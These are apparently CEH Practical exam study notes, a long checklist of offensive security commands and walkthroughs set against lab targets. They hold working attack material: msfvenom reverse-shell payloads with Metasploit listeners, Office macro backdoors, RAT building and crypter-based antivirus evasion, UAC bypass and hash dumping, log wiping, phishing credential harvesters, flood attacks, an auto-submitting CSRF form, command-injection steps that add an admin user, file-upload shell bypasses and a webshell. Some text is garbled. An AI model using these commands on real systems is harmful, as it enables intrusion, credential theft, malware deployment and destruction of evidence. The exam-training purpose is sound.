CEH_Practicl | Pentest Complete Checklists 2022

Pentest Complete Checklists 2022

CEH Practical (MASTER) Notes

By Chinmaya Ramana (CEH CHFI CCIO)

October 1, 2022

Ethical Security Experts

Contents

Scanning Networks 4

Enumeration 6

Vulnerability analysis 10

System hacking 10

Steganography 14

SQL Injection 15

Hacking Web Applications & Servers 15

Cloud Computing : 17

Cryptography: 17

Scanning: 21

Enumeration 23

Vulnerability Assessments 26

System hacking 27

Malware Threats 33

Sniffing 35

Social Engineering 37

Denial of Service 38

Session Hijacking 39

Evading IDS Firewalls and Honeypots 40

Hacking Webservers 41

Hacking Web applications 42

SQL Injection 47

Hacking Wireless Networks 48

Hacking Mobile Applications 51

IOT and OT Hacking 52

Linux based tools 55

-------------Tools, Commands and Techniques for CEH Master--------------- 56

1) Nmap 56

2) wpscan 57

3) sqlmap 58

4) Hashcat and john 59

5) Netuser 61

6) Hydra 61

7) Phonesploit 62

8) 62

9) Enumeration 62

10) Steganography 63

11) Wireshark DDOS and Passwords 63

12) Easy - Command Injection 63

13) Medium - Command Injection 63

14) High - Command Injection 64

15) FILE UPLOAD – WINDOWS 64

16) Steghide 64

17) Banner-grabbing 64

cURL 65

Wget 65

Telnet 65

Netcat 65

Nikto 65

Nmap 65

Dmitry 66

18) Directory Busting 66

18) CEWL 67

Exam Cheats sheets (1): 67

NMAP 67

CEWL 67

FUZZING 67

HASHCAT 67

Hydra 68

Johntheripper 69

Netdiscover 69

Responder 69

Searchsploit 71

SQLmap 71

TCPdump 72

Wireshark 72

Wpscan 73

Exam Cheats sheets (2): 73

Exam Cheats sheets (3): 77

Exam Cheats sheets (3): 79

Exam Cheats sheets (4): 82

Exam Questions: 92

TryHackMe Rooms 94

Scanning Networks

Note:

MegaPing

MegaPing is the ultimate must-have toolkit that provides all essential utilities for Information System specialists, system administrators, IT solution providers or individuals.

Mega Ping is also a port and service scanning tool which is for Windows.

Hping3

hping3 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies.

It handles fragmentation and arbitrary packet body and size, and can be used to transfer files under supported protocols. Using hping3, you can test firewall rules, perform (spoofed) port scanning, test network performance using different protocols, do path MTU discovery, perform traceroute-like actions under different protocols, fingerprint remote operating systems, audit TCP/IP stacks, etc. hping3 is scriptable using the Tcl language.

Hping3 is a python based tool used to scan and flood(DOS) the particular IP.

Enumeration

Tool: https://nbtenum.sourceforge.net/

Microsoft Documentation: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat

Tool :

Vulnerability analysis

Tools:

OpenVAS

Nessus

GFI LanGuard

Nikto

System hacking

Gem References:

Command used: msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=YOUR-IP-ADDRESS LPORT=ANY-FREE-PORT -o /root/Desktop/virus.exe

Gem:

Blog:

Steganography

Gem:

SQL Injection

Tool:

Hacking Web Applications & Servers

$ medusa -h 10.10.10.x -U /root/Documents/user_list.txt -p /root/Documents/pass_list.txt -M ftp -F

Reference: https://www.youtube.com/playlist?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q

Cloud Computing :

Cryptography:

Scanning:

nmap -sn -PR 192.168.1.1

acquire nmap cheatsheet

hping 3 -A 192.168.1.1 -p 80 -c 5

-A SCK Flag

-p port

-c pkt count

no respnse -filtered

response - closed

hping3 -8 0-100 -S 192.168.1.10 -V

-8 scan mode or --scan

0-100 port range

-V versbose

-S SYN FLAG

hping3 --scan 0-100 -S 192.168.1.10 -V

os/banner grabbing using 1-TTL.png

method

ping ip

open wireshark and chekc time to live FLAG value in IPV4 SECTION

os/banner grabbing using NMAP NSE

nmap -A 192.168.1.2

nmap --script smb-os-discovery.nse 192.168.1.1

os discovery using unicorn scan

unicornscan $ip -Iv

-I immediate mode

-v verbose mode

result would be TTL values compare with TTL chart

scan beyond IDS and firewall

nmap -f $ip

-f fragment pkts

most ids skip reassembly and makes pkts pass

nmap -g 80 $ip

-g , --source-port change actual source port with common ones

nmap -mtu 8 $ip

-mtu maximum transmission unit, smaller pkts transmission

nmap -D RND:10 $ip

-d performs a decoy scan

RND generates random and non reserved IP addresses

create custom pkts using colasoft pkt builder to scan beyond IDS/firewall

create custom udp / tcp pkts using hping3 to scan beyond IDS/firewall

hping3 $ip --udp --rand-source --data 500

--udp udp pkts

--rand-source random source mode

--data pkt body size

create custom udp / tcp pkts using nmap to scan beyond IDS/firewall

nmap $ip --data 0xdeadbeef

--data hex string to send binary data

nmap $ip --data-string "i am http://youtube/c/mastersprak"

--data-string string data

nmap $ip --data-length 5

--data-length append random bytes to pkts

nmap $ip --randomize-hosts

--randomize-hosts scan in random order

nmap $ip --badsum

--badsum send bogus tcp/udp checksum to avoid detection

draw network diagram using network topology mapper

the scan result will give you hw/sw details of detected computers in networks

perform network scanning using various network scanning tools

using NMAP

nmap $ip/24 -sS -A -Ox Test

-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans

-A: Enable OS detection, version detection, script scanning, and traceroute

-oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3

using metasploit

Method 1

import nmap text.xml into msf

db_import Test

hosts

list of ips discovered, with os name, service pack, mac addr

services

list of ips, open ports, protocol,service name,state,info

Method 2

Phase1- Network Discovery

search portscan

use auxiliary/scanner/portscan/syn

set INTERFACE eth0

set PORTS 80

set RHOSTS 192.168.1.10-30

set THREADS 50

run

Phase2- OS Discovery

use auxiliary/scanner/smb/smb_version

set RHOSTS 192.168.1.10-30

set THREADS 50

run

Phase3- Service Discovery (e.g ftp port 21 is open)

use auxiliary/scanner/ftp/ftp_version

set RHOST 192.168.1.10

run

Phase4- save results in file

hosts -o scanresults.csv

Enumeration

Enumeration

Extraction of username,machine names,network resources, shares and services from a system or network,

audit & service settings, snmp & fqdn,

perform netbios enumeration

-extract list of computers in domain,network shares, and policies.

netbios name 16ch ascii string, used as device name

allow attacker to read/write to remote system

*NB enum using cmd

nbtstat -a $ip

a nb name of remote comp

nbtstat -c $ip

c nb name cache of remote comp

net use

connection status, shared folder, network info

connect or disconnects a computer from shared resource

*nb enum using netbios enumerator

*nb enum using nmap nse

nmap -sV -v --script nbstat.nse $ip

-sV: Probe open ports to determine service/version info

*perform smnp enum

extract info about network resource- hosts,routers,devices,shares, routing table, device info,traffic stat

**perform smnp enum using snmp-check

check if snmp is open

nmap -sU -p 161 $ip

-depicts : 161 is being used by the default public ocmmunity string

snmp-check $ip

//get info about sys info and user accounts,network info , network interfaces,routing info,and listening ports

//process, storage ,file system ,device info,shares ,file system

**perform smnp enum using soft perfect network scanning

specify range ,discover devices,rightclick properties and get details

*perform LDAP enumeration

..generate list of distributed directory services on target system

..directory services has hierarchical and logical tree about components of network, from list of printers to corporate email directories

.. company org chart

**perform LDAP enumeration using Active Directory Explorer by sysinternals

connect using IP and creds

complete AD would be displayed and possible to modify also

*perform NFS Enumeration

NFS - access / view /store /update files on reomote server

After LDAP go for NFS - IDENTIFY EXPORTED DIRECTORIES,list of clients connected to server with their ip addr and shared data associated with them

Possible to spoof ip and get acces to shared resource

**perform NFS Enumeration superenum

check if nfs is open

nmap -p 2049 $ip

nfs also runs on other ports

echo $ip > target.txt

./superenum

//pass filename -> target.txt

15-20 minutes to complete

**perform NFS Enumeration rpc-scan

git clone https://github.com/hegusung/RPCScan

python3 rpc-scan $ip --rpc

it will show the list if nfs is open

*perform dns enum

//collect dns server name,hostnames,machine names,usernames,ip addrr and aliases in target domain

**perform dns enum using zone transfer

open termninal in linux

dig ns www.certifiedhacker.com

reterive info about dns name server pf target domain and displays in answer section

try if zone transfer is possible

dig @ns1.bluehost.com www.certifiedhacker.com axfr

axfr reterive zone information

**perform dns enum of windows DNS servers.

open cmd in windows

>nslookup

>set qyerytype=soa

soa start of authority record, administrative info about dns zone

>certifiedhacker.com

>ls -d ns1.bluehost.com

ls -d requests zone transfer

ns1.bluehost.com primary name server

**perform dns enum usign DNSSEC zone walking

//dns records(MX,SOA,NS,A,AAAA,SPF,TXT) enumerator

dnsrecon -d www.certifiedhacker.com -z

-d domain

-z zone walk using standard enum procedure

*perform rpc, smb, and ftp enumeration

rpc-> check vulnerable services on these ports

smb-> enable banner grabbing, os detais,service version

ftp-> check ftp services and attack, ftp bounce, ftp brutre and packet sniffing

*perform rpc & smb enumeration using netscan tools pro

RPC- netscan tools pro

>MANUAL TOOLS

>nix RPC info

>target ip, target port 111

>dump portmap

>result: reterival of all running registred daemons on target system

SMB- - netscan tools pro

>smb scanner

>add to list ->ok

>login cred, username, password > add to list > ok

>click get smb versions

>result: netbios name,dns name,smb versions,shares

*perform rpc & smb & ftp enumeration using nmap

nmap -p 21 $ip

nmap -A $ip

nmap -A -p 445 $ip

*perform enumeration using various enum tools

*global network inventory

>new audit wizard

>single address scan

>name-> IP

>connect as -> credentials

*enumerate resources using Advanced IP Scanner

*enumerate info from windows and samba hosts using enum4linux

enum4linux -u martin -p apple -n $ip

-n Do an nmblookup (similar to nbtstat)

//information: target info,workgroup/domain,domain SID(SECURITY IDENTIFIER), list of users with RID(RELATive identifier)

enum4linux -u martin -p apple -P $ip

//password policy info

enum4linux -u martin -p apple -S $ip

//share policy info

Vulnerability Assessments

vulernability scoring system

cwe - common weekness enumeration

cve - common vulnerabilities and exposure

nvd - national vulnerability database

cvss- common vulernability scoring system

*Perform vulnerability research in common weekness enumeration

https://cwe.mitre.org

> search cwe > smb > links would be shown

*Perform vulnerability research in common vulnerabilities and exposure

https://cve.mitre.org

search > cve-2017-5638

*Perform vulnerability research in national vulnerability database

base score: inherent quality of vuln

temporal score: quality of vuln that change over time

>search vulnerabilty database

>keyword search > smb

*perform vulnerability assesment using various vulnerability assessment tools

*OpenVas

>scan> tasks>

*Nessus

>advanced scan >ip

*GFI Lan Guard

>launch a scan

perform web server and app vulnerability scanning using CGI Scanner Nikto

nikto -h www.certifiedhacker.com -tunning x

-h target host

-x reverse tunning (include all except specified)

-tunning -increase /decrease test performed against target

nikto -h www.certifiedhacker.com -Cgidirs all

nikto -h www.certifiedhacker.com -o Nikto -f txt

System hacking

Perform active online attack to crack system password using responder

*LLMNR, NBT-NS -> Perform name resolution for host

cd Responder

chmod +x Responder.py

sudo ./Responder.py -I ens33

-I interface

ens33 interface name

server will start running and waiting for some connection in network

if hash captured visit same location as of responder

filename-> SMB-NTLMv2-SSP-10.10.10.10.txt

rename to hash.txt

open johnripper to crack hash collected

sudo john hash.txt

it will use default wordlist

____________________________________________________________________________________

*Audit password using lopht crack

pw audit wizard

> windows

>remote mahcine

>credentials

>Thorough pw audit

____________________________________________________________________________________

*find vuln on exploit sites

>>exploitdb.com

>search edb

>set type, platform, title e.t.c

>download

>>securityfocus.com

>search and download exploit from here

____________________________________________________________________________________

*exploit client side vuln & establish a VNC session

msfvenom -p windows/meterpreter/revese_tcp --platform windows -a x86 -f exe LHOST 10.10.10.13 LPORT 4444 -o /root/Desktop/Test.exe

**make user to run above exe

**on attack side

msfconsole -q

use exploit/multi/handler

set LHOST 10.10.10.13

set LPORT 4444

exploit

once exploited , meterpreter would be received

*Esclate previlages

git clone https://github.cmo/PowerShellMafia/PowerSploit

Run following commands from meterpreter

upload /root/PowerSploit/Privesc/PowerUp.ps1 PowerUp.ps1

shell

powershell -ExecutionPolicy Bypass -Command "..\PowerUp.ps1;Invoke-AllChecks"

give you details about system services,registry autoruns,unattended installs e.t.c

run vnc

____________________________________________________________________________________

* Gain Access to remote system using Armitage

connect > host,port,user,pass

hosts>nmap scan>intense scan>give ip

step 1

from left pane select windows/meterpreter/meterpreter_reverse_tcp

set LHOST,LPORT ,OUTPUT TYPE = EXE

copy to client

step 2

from left pane select windows/meterpreter/meterpreter_reverse_tcp

set LHOST,LPORT ,OUTPUT TYPE = multi/handler

launch on attacker

execute exe created in step 1 on client, system will be pwned & meterpreter will be received at attacker

____________________________________________________________________________________

*Hack a windows machine with malicious office doc using the fat rat

step1

git clone https://github.com/Screetsec/TheFatRat

cd TheFatRat

chomd +x fatrat

chomd +x setup.sh

chomd +x powerfull.sh

./setup.sh

select install searchsploit from kali repo

fatrat

create fud backdoor 1000% with pwnwinds [Excellent]

create exe file with apache + powershell

set LHOST,LPORT , filename (payload)

choose payload -> windows/meterpreter/reverse_tcp

backdoor created

step2

fatrat

7-create backdoor for office with microsploit

2-the microsoft office macro on windows

set LHOST, LPORT, filename (BadDoc)

Enter mssage body= you have been hacked

are you want to use custom backdoor? >yes

payload.exe (backdoor created in first step)

step3

**on attack side

msfconsole -q

use exploit/multi/handler

set LHOST 10.10.10.13

set LPORT 4444

exploit

once exploited , meterpreter would be received

____________________________________________________________________________________

********** Buffer overflow missing

____________________________________________________________________________________

*perform priv esclation

let's start after attainning meterpreter shell

exploit session as background

exploit -j -z

bring to front

sessions -i 1

*using Beroot

*use Beroot to run a config assement test on target to find vuln, services other data etc

meterpreter> upload beRoot.exe

shell

beRoot.exe

*** try to esclate priv

method 1

run post/windows/gather/smart_hashdump

error:insufficent previlages

method 2

getsystem -t 1

error:access denied

bypass windows UAC protection via fodhelper

meterpreter>background

use exploit/window/local/bypassuac_fodhelper

show options

set SESSION 1

set LHOST $IP

set LPORT 444

set TARGET 0 (for windows)

exploit

*check privilages again

getuid

output:windows10\admin

get system -t 1

output:got sytem via technique 1

getuid

output: NT Authority\System

check again

run post/windows/gather/smart_hashdump

output:hashes would be displayed

____________________________________________________________________________________

* MACE, Modeified,Access,Created,Entry Modified

MACE change qucikly on access to reset them on will TimeStomp command is used

>timestomp secret.txt -m "02/11/22 08:10:03"

to view updation

>timestomp secret.txt -v

similarly -a, -c, -e is used for others

____________________________________________________________________________________

* maintain remote access and hide malicious activity

1- user system monitoring and surviellence using powerspy

2- user system monitoring and surviellence using spytech spyagent

Hide Files using NTFS Streams

NTFS

>Store data using 2 file systems

stream 1 -security descripters such as permissisons

strean 2 -actual data

Procedure

copy calc.exe to c:\magic

create readme.txt and write hello word in it

type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe

now delete calc.exe

mklink backdoor.exe readme.txt:calc.exe

backdoor.exe

calc would be opened,backdoor is just name of link it will open calc.exe in readme file

____________________________________________________________________________________

Hide data using white space steganography

Stego

hello world > original.txt

snow -C -m "ACCOUNT NUMBER 123" -p "magic" original.txt stegoed.txt

-p password

-m message

-C compression

Unstego

snow -C -p "magic" stegoed.txt

output: ACCOUNT NUMBER 123

____________________________________________________________________________________

Image stego using open stego

messagefile, coverfile, password, encryption, output file

____________________________________________________________________________________

*Covert Channel using Covert_TCP

parrot

(compile covert_tcp.c)

cc -o cover_tcp covert_tcp.c

a warnning would be generated

ubuntu

tab1:

sudo su

tcpdump -nvvx port 8888 -i lo

tab2:

(compile covert_tcp.c)

cc -o cover_tcp covert_tcp.c

a warnning would be generated

start a listener

./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -source_port 9999 -dest port 8888 -server -file receive.txt

output: lsitening for data from 10.10.10.13, and port 9999

parrot

./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -source_port 8888 -dest port 9999 -server -file secret.txt

data transmission started

____________________________________________________________________________________

*Clear logs to hide evidence

disable auditing, clear log, manipulate logs, cover track on network/os, delete files, disable win unctinlaity

____________________________________________________________________________________

view enable or clear audit policies using auditpol

auditpol /get /category:*

output: displays system audit policy

*** enable audit policies

auditpol /set /category:"system","account logon" /success:enable /failure:enable

*** clear audit pol

auditpol /clear /y

____________________________________________________________________________________

*clear windows machine logs using various utilities

method 1

systemhacking \covering tracks\clear_event_viewer_logs.bat > run as admin

method 2

cmd> wevtutil el

shows all logs

wevutil cl system

system is log name others can b application, security

method 3

cmd> cipher /w:C:

overwrite deletd files with zeroes and then 2555s

securely deletes a chunk of data

____________________________________________________________________________________

clear linux machine logs using the bash shell

export HISTSIZE=0

number of commands to be saved

history -c

-c rewrite or review earlier command , alternate to disable history

-w delete history

shre ~/.bash_history

shred history file

(clear windows machine logs using c cleaner

Malware Threats

*Gain control over victim machine using njRAT RAT trojan

open njrat > builder > host,port,name,copyto startup, copy to regiustry > build

execute exe at client side and receive connection

_____________________________________________________________________________

*Hide Trojan using swayzCrypter and make it undetectable using various antivirus programs

import exe >check startup,mutex,disable uac > encrypt

check on virus total

_____________________________________________________________________________

*Create server using ProRAT tOOL

CLICK create>create prorat server (342kbayt)

set server port, password,victim name

click bind with file > bind server with file

import any jpg

click server extension > exe

generate exe

execute at client side

connect using ip,port at server side

_____________________________________________________________________________

* Create a Trojan using Theef RAT Trojan

_____________________________________________________________________________

2 files

server210.exe --- vitim

client210.exe --- attacker

virus >

self repilcating program,

attach copies of itself to other exe's , based on specific events

operates without knowledge/desire of user

worm > like a virus, does requrie a worm to replicate

____________________________________________________________________________

* Create a Virus using JPS Virus Maker tool

Too many options, set as much require , e.g. change windows password

check convert to worm

click create virus

execute on server side

_____________________________________________________________________________

* Perform static malware anlayis

1- Check on Virus total

2- Perform string search using BinText

extract string out of exe

3- Identify Packaging & obfuscation methods using PEid

it may give you warnning after detecting virus

4- Find PE info of a Malware executable file

5- Perform malware disassembly using IDA and OllyDbg

Graphs > flowcharts

View > Executable Modules

_____________________________________________________________________________

* Perform dynamic malware anlayis

To run in monitored form

system baselining > capture snapshot before execution of sucpicous file

Host integrity monitoring > to study the change taken place after execution of sucpicious file

*** Using TCP view and Curr Ports - Sysinternals

1- execute and make a connection using njRat trojan tool

2- open tcp view to mointor connections on system

right-click>properties

*** Using Process Monitor

Run > select process > properties > process > path and details

*** Using Reg Shot

1- 1st shot and save

2- install desired software

3- second shot and save

4- compare

*** Using JV16 Powertools

perform intensive scan for unwanted resource using jv16 powertools

clean and speedup my pc

*** Windows services montioring using windows service manager (srvman)

select and check properties of running services

*** Perform startup program monitoring using Autoruns and Win Patrol

Autoruns >explorer> shows list of startup programs

same way winpatrol works

*** Installation monitoring using Mirekusoft Install Monitor

programs > view installed programs

cleanup using win patrol will remove all remenants of uninstalled programs

*** Files and Folders monitoring using PA File Sight

*** Device Driver monitoring using DriverView and Driver Booster

driver monitoring > properties

driver booster > missing/outdated drivers

*** Perform DNS monitoring using dnsquerysniffer

>select interface

>gui would display any incoming dns query

Sniffing

* MAC flooding using macof

Force switch to act as hub

macof -i eth0 -n 10

-i interface

-n count

_______________________________________________________________________________________

*DHCP Stravation using Yersinia

> yersinia -I

>gui

> h for help

>f2 > DHCP Mode

> press 1 to send discover packet

_______________________________________________________________________________________

*ARP Poisoning using arpspoof

arpspoof -i eth0 -t target-ip-to-arp-spoof accesspoint-ip

-t specifies host to arp poison

informing the target ip that i am the access point

check windows cmd for arp table modification on victim

arp -a

_______________________________________________________________________________________

* MITM using Cain & Abel

obtain passwords using cain and abel

system 1:

>configure > sniffer > ensure the correct adapter is selected

>main menu > plus icon > mac addr scanner > all hosts in my subnet >acquire list

>click arp button at bottom

>click + icon > new arp poison routing

> select sender and receiver of traffic you want to monitor

> start/stop arp posioning

System 2:

ftp 10.10.10.10

provide login creds

system 1:

> Displays the traffic in ftp section

> see username and password here

_______________________________________________________________________________________

*Spoof mac using TMAC & SMAC

TMAC

> select interface > random mac > change now

SMAC

> select interface > click random > update

_______________________________________________________________________________________

*Perform network sniffing using variou tools

***WireShark password sniffing

******LOGIN PASSWORD CAPTURE OF HTTP

>monitor interface using wireshark

>open http://moviescope.com in browser and login

> filter wireshark traffic

http.request.method == POST

>Top menu > find packets

write search string pwd

> click find and packet would be displayed

****** REMOTE RDP PACKET CAPTURE

>RDP to remote host

>services > remote packet capture protocol (experimental) > start

>close remote desktop

> open wireshark

>interface icon> manage interfaces>remote interface> add ip,passwords of remote system

> packets of remote system activity can be seen on your wireshark

*Analyze a Network using Capsa Network Analyzer

> install > full analysis

> various categories would be auto created based on data, protocol, statistics

*Analyze a Network using Omni Peek network Analyzer

>Segments various info about network in nice categories

*Analyze a Network using Steel Central Packet Analyzer

>select interface from left

>login to some website

>check various categories

_______________________________________________________________________________________

*Detect ARP poisioning in switch based network

*** WireShark

> wireshark >preferences>protocols>ARP

>check "Detect ARP request storms"

> Analyze > Expert information

>IP address duplication

ARP Posion the network using cain & abel and detect using above 2 methods

*** XARP

install only and notify in case of arp poisoning

*** Detect promiscous mode using nmap

nmap --script sniffer-detect $ip

*** NetScan Tool Pro

Manual tools> promiscous mode scanner

>ip range > do scan

_______________________________________________________________________________________

Social Engineering

Sniff user cred using SET

>SET

>SOCIAL engineering attacks

>website attack vector

>credential harvestor attack method

>site cloner

>ip where cred should be posted back

>link of website to clone

>send email with this link

>once user enter creds , they would be posted back on provided ip

________________________________________________________________________________________

*Perform phishing using ShellPhish

>chmod +x ./shellphish.sh

>./shellphish

>select website to clone

>select Ngrok as port forwarding option

>a link would be generated

> https://a6375de.ngrok.io

>share link

> creds would be posted back on your terminal

________________________________________________________________________________________

*Detect phishing Attack

*** Net Craft

netcraft extension for chrome

autoblock phishing

*** Phish Tank

> enter url of susected site in search

> check reputation

________________________________________________________________________________________

Audit org. sec. aganst phishing using ohphish

>entice to click > create email > send to company's employees

> auto report generated

Denial of Service

*Perform a DOS attack (syn flooding) using metasploit

use auxiliary/dos/tcp/synflood

set RHOST

set RPORT

exploit

it would generate flood on target

________________________________________________________________________________

Perform DOS USING Hping3

hping3 -S $target-ip -a $spoofed-ip -p 22 --flood

-S set SYN flag

-a spoof self ip

-p dest port

open wireshark > statistics > I.O graph

***to send large high volume data

hping3 -d 65538 -S $target-ip -a $spoofed-ip -p 22 --flood

***flood udp port of netbios

hping2 -2 -p 139 --flood $ip

-2 udp mode

_______________________________________________________________________________

Perform DOS USING HOIC & LOIC

ENTER TARGET

SET POWER > HIGH

ADD

FIRE THE LAZER

______________________________________________________________________________

Detect / protect against dos attack using anti ddos guardian

Session Hijacking

intercept using burp or zap

can repeat or change request data manually

______________________________________________________________

intercept using bettercap

bettercap -iface eth0

10.10.10.0/24 > 10.10.10.13

net.probe on

net.recon on

set net.sniff.regexp '.*password=.+'

collect all logins on specified network

for ssl based sites

set http.proxy.sslstrip true

______________________________________________________________

Detect session hijacking

ids/ips

wireshark

Evading IDS Firewalls and Honeypots

Configure snort to detect malicous traffic

_________________________________________________________________________________

Detect Malicious N/W traffic using zone alarm free firewall

> app control mode > auto learn

> basic firewall> view zones>add>host/site

> add zone to trust or block

_________________________________________________________________________________

Detect Malicious N/W traffic using HoneyBOT

> install

> check following

# auto start on load

# capture binaries

# rotate logs

# export logs

> capture will be started auto

_________________________________________________________________________________

*Firewall Evasion using various techniques

***NMAP

>BLOCK TRAFFIC OF ATTACKER IN FIREWALL

> nmap $ip

output:all ports are filtered

Let's ping sweep

> nmap -sP $ip

output: ports and live hosts would be displayed

Let's zombie scan

> nmap -sI $ip

output: open pors with service and verison info

*** HTTP/FTP TUNNELING

vicitm

> services > world wide web publishing service

> run HTTHOST ON VICTIM

> ESTABLISH A LISTENER AT PORT 90

> add firewall rule to block traffic to port 21

attacker

> not able to ftp to victim

> install HTTPORT

> ENTER HOST,IP IN PROXY TAB @ BOTH FIELDS

> CLICK PORT MAPPING > ADD > NEW MAPPING RIGHT CLICK > EDIT > ADD PORT 21

> START

> TRY TO FTP AGAIN

> PORT 21 TRAFFIC WOULD BE TUNNLED FROM PORT 90

Hacking Webservers

information gathering using ghost eye

> python3 ghost_eye.py

output : menu with diff info gathering options

> enter 1: whois lookup

> input: ceh.com

output whois info

> test clickjacking by entering 6

________________________________________________________________________________________________

Web server recon using skip fish

skipfish -o skifish-output.txt -S /usr/share/skipfish/dictionaries/complete.wl http://10.10.10.10:8080

________________________________________________________________________________________________

Web server recon using httprecon

> add domain and port

> click analyze

________________________________________________________________________________________________

Web server recon using idserve

-identify web server ,http server, non http server, reverse dns lookup

>enter url

>query the server

________________________________________________________________________________________________

Footprint webserver using netcat and telnet

nc -vv www.moviescopr.com 80

output : http response in terminal , X-Powered by : Asp.net

________________________________________________________________________________________________

Footprint webserver using netcat and telnet

nmap -sV --script=http-enum www.goodshopping.com

nmap --script hostmap-bfk -script-args hostmap-bfk.prefix=hostmap- www.goodshopping.com

To detect VULNERABLE web server by checking if http trace method is enabled

nmap --script http-trace -d www.goodshopping.com

To check web app firewall is configured on target or domain

nmap -p80 --script http-waf-detect www.goodshopping.com

________________________________________________________________________________________________

*uniscan web server fingerprinting

directory enumeraton like ffuf , gobuster or dirbuster

uniscan -u http://10.10.10.10:8080/CEH -q

*** To check robots.txt and sitemap.xml

uniscan -u http://10.10.10.10:8080/CEH -we

*** Enable dynamic testing option

uniscan -u http://10.10.10.10:8080/CEH -d

________________________________________________________________________________________________

*Perform a web server attack

*** Crack FTP Cred using dictionary attack

>hacking web servers> wordlists

check if ftp is open

nmap -p21 $ip

check if anonymous login is allowd

login failed ?

hydra -L wordlists/usernames.txt -P wordlists/Passwords.txt ftp://$ip

output: displays login creds

Hacking Web applications

*Perform web app recon

netcraft, smartwhois, whoislookup, batchipconverter

** check if http is running with NMAP

nmap -T4 -A -v www.moviescope.com

** use telnet for banner grabbing

telnet www.moviescope.com

__________________________________________________________________________________________

*Perform web app recon using whatweb

whatweb -v url

whatweb --log-verbose=moviescope Report url

__________________________________________________________________________________________

perform web spidering using owasp zap

-Help discover hidden content

> zaproxy >url to attack >attack

__________________________________________________________________________________________

Detect Load balancers

>dig yahoo.com

output: multiple ips in answer section means load balancers are there

>lbd yahoo.com

output:

check for dns load balancers

check using received applciation data

__________________________________________________________________________________________

Identify web server directories

*** NMAP

nmap -sV --script=http-enum www.movie.com

*** Gobuster

gobuster dir -u http://ww.movie.com -w common.txt

__________________________________________________________________________________________

Perform web app vulnerbility scanning using vega

>enter url > seect modules > check injection,response processing modules

>run

__________________________________________________________________________________________

identify click jacking using iframe

create following file iframe.html

<html>

<head>

<title>Click jacking vuln test</title>

</head>

<body>

<p>site is vulnerable to click jacking</>

<ifram src="http://ww.movie.com" width="800" height="600"></iframe

</body>

<html>

__________________________________________________________________________________________

Brute force attack using burpsuite

enter login creds > intercept in burp

pass to intruder

goto intruder > clear all positions

selct username and password to be as variable

attack type > cluster bomb

start attack > filter by length

__________________________________________________________________________________________

Parameter tampering using burpsuite

manipulation of parameters exchanged in web request

login > view profile > intercept in burp > change profile id from 1 to 2

profile of user 2 would be displayed

__________________________________________________________________________________________

Exploit paramter tampering and XSS vulnerability in XSS Application

paramter tampering

change profile id param in get request in url and profile of second user will be displayed

XSS vulnerability

occurs in dynamically generated web pages

<script>alert('hello world')</script>

__________________________________________________________________________________________

CSRF cross site request forgery attack

to send a request to vulnerablite site from malicious site

case study

leenk.me 2.5.0 is installed as wp plugin and enabled

open http://wpvulndb and generate API token (free: 50 api requests)

open wpscan

wpscan --api-token token-here --url http://10.10.10.10:8080/CEH --plugins-detection aggressive --enumerate vp

--enumerate vp specifies enumeration of vulnerable plugins

output: leenk.me 2.5.0 is vulnerable to xss and csrf

create a security-script.html

<html>

<body onload="document.forms['CSRF'].submit()">

<form name="CSRF" action="http://10.10.10.16:8080/CEH/wp-admin/admin.php?page=leemkme_facebook" method="POST">

<input type="hidden" name="facebook_profile" value="on" />

<input type="hidden" name="fb_publish_wpnonce" value="" />

<input type="hidden" name="wp_http_referer" value="CSRF" />

<input type="hidden" name="facebook_message" value="" />

<input type="hidden" name="facebook_linkname" value="" />

<input type="hidden" name="facebook_caption" value="" />

<input type="hidden" name="facebook_description" value="</textarea>;<script>prompt();</script>" />

<input type="hidden" name="default_image" value="CSRF" />

<input type="hidden" name="message_preference" value="author" />

<input type="hidden" name="clude" value="in" />

<input type="hidden" name="publish_cats[];" value="0" />

<input type="hidden" name="update_facebook_settings" value="save settings" />

<input type="submit" value="submit form"/>

</form>

<body>

</html>

execute above script to check if CSRF is possible

__________________________________________________________________________________________

Enumerate & Hack a web app using WPScan and Metasploit

wpscan --api-token token-here --url http://10.10.10.10:8080/CEH --enumerate u

--enumerate u enumerate users

acquire list of users

msfconsole -q

use scanner/http/wordpress_login_enum

set PASS_FILE /home/attacker/desktop/wordlist

set RHOSTS 10.10.10.10

set RPORT 8080

set TARGETURI http://10.10.10.10:8080/CEH

set USERNAME admin

run

__________________________________________________________________________________________

Exploit RCE to compromise a target web server

DVWA > PING A DEVICE

| whoami

output: nt authority/system

| tasklist

output: procesees

| net user Test /Add

create user named as test

| net user

list all users

| net user Test

check access rights of Test , local group membership

| net localgroup Administrators Test /Add

Add Test user to admin group

__________________________________________________________________________________________

Exploit file upload vulnerability at different security levels

msfvenom -p php php/meterpreter/reverse_tcp LHOST=10.10.10.13 LPORT=4444 -f raw

output : raw shell data on terminal

copy data from terminal and paste in file upload.php

dvwa > security level > low

upload file to site

output: uploaded

listener for shell

use exploit/multi/handler

set PAYLOAD php/meterpreter/reverse_tcp

set LHOST 10.10.10.13

set LPORT 4444

run

listener started

execute file from ../../hackable/uploads/upload.php

meterpreter acquired

dvwa > security level > medium

upload file to site

output: only jpg allowed

change name from upload.php to upload.php.jpg

upload file to site > intercept from burp change upload.php.jpg to upload.php again

output: uploaded

listener for shell : same as above

dvwa > security level > high

open upload.php

Add following data to 1st line

GIF98

change name from upload.php to high.jpeg

upload file to site

output: uploaded

from command injection change file name from high.jpeg to shell.php

execute file from ../../hackable/uploads/shell.php

listener for shell : same as above

__________________________________________________________________________________________

Gain Backdoor access via a webshell using weevely

weevely generate toor shell.php

toor > password

weevely http://10.10.10.10:8080/CEH/dvwa/hackable/uploads/shell.php toor

output waiting for connection

execute listener on other side

connection received

__________________________________________________________________________________________

Detect web app vuln using vuln scanner

N-stalker web app vuln scanner

enter website

scan policy > owasp

start session

check if any vuln found

SQL Injection

Perform SQL INjection on MSSQL db

open login form

username> blah' or 1=1 --

password> empty

login success

______________________________________________________________________________________________________

Blind sql injection:

site is vulnerable to sql injection but results are not visible to attacker

attacker poses true or false question to db to check if blin sqli is possible

